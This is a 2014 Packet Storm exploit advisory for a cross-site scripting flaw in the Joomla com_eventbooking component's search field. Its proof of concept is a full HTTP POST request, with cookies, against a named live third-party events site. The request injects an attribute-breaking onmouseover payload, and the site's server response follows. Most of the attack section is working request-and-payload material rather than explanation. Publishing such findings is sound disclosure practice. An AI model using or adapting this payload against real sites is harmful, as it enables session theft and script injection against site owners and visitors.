Joomla Eventbooking Cross Site Scripting

2014-11-13T00:00:00
ID PACKETSTORM:129099
Type packetstorm
Reporter Jagriti Sahu
Modified 2014-11-13T00:00:00

Description

                                        
                                            `##################################################################################################  
#Exploit Title : Joomla com_eventbooking component XSS vulnerability  
#Author : Jagriti Sahu AKA incredible  
#Download Link : https://github.com/Jasonudoo/platform/tree/master/components/com_eventbooking  
#Date : 13/11/2014  
#Discovered at : IndiShell Lab  
#Love to : Surbhi, Mrudula and Harry  
#Discovered At : Indishell Lab  
##################################################################################################  
  
////////////////////////  
/// Overview:  
////////////////////////  
  
  
joomla component com_eventbooking is not filtering data in search parameter   
and hence affected from XSS vulnerability   
  
///////////////////////////////  
// Vulnerability Description:  
///////////////////////////////  
vulnerability is due to search parameter in search box, and pron to xss vulnerability  
  
  
////////////////  
/// POC ////  
///////////////  
  
POC image=http://oi61.tinypic.com/aol6qc.jpg  
  
  
http://eastvicevents.com.au/index.php?option=com_eventbooking&Itemid=101  
  
POST /index.php?option=com_eventbooking&Itemid=101 HTTP/1.1  
Host: eastvicevents.com.au  
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: keep-alive  
Referer: http://eastvicevents.com.au/index.php?option=com_eventbooking&Itemid=101  
Cookie: 230d19898da30be54648f536cbac3652=ca2096bf2055cf7c31462f8f056f84d4; __utma=222259084.1320908457.1415891642.1415891642.1415891642.1; __utmb=222259084.18.10.1415891642; __utmc=222259084; __utmz=222259084.1415891642.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 177  
  
search=test" onmouseover=prompt(String.fromCharCode(120,115,115,32,116,101,115,116,105,110,103));//&category_id=13&location_id=474&option=com_eventbooking&Itemid=101&view=search  
  
HTTP/1.1 200 OK  
Content-Encoding: gzip  
Vary: Accept-Encoding  
Date: Thu, 13 Nov 2014 16:10:17 GMT  
Server: LiteSpeed  
X-Powered-By: PHP/5.5.18  
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"  
Content-Type: text/html; charset=utf-8  
Cache-Control: no-cache  
Pragma: no-cache  
Connection: close  
`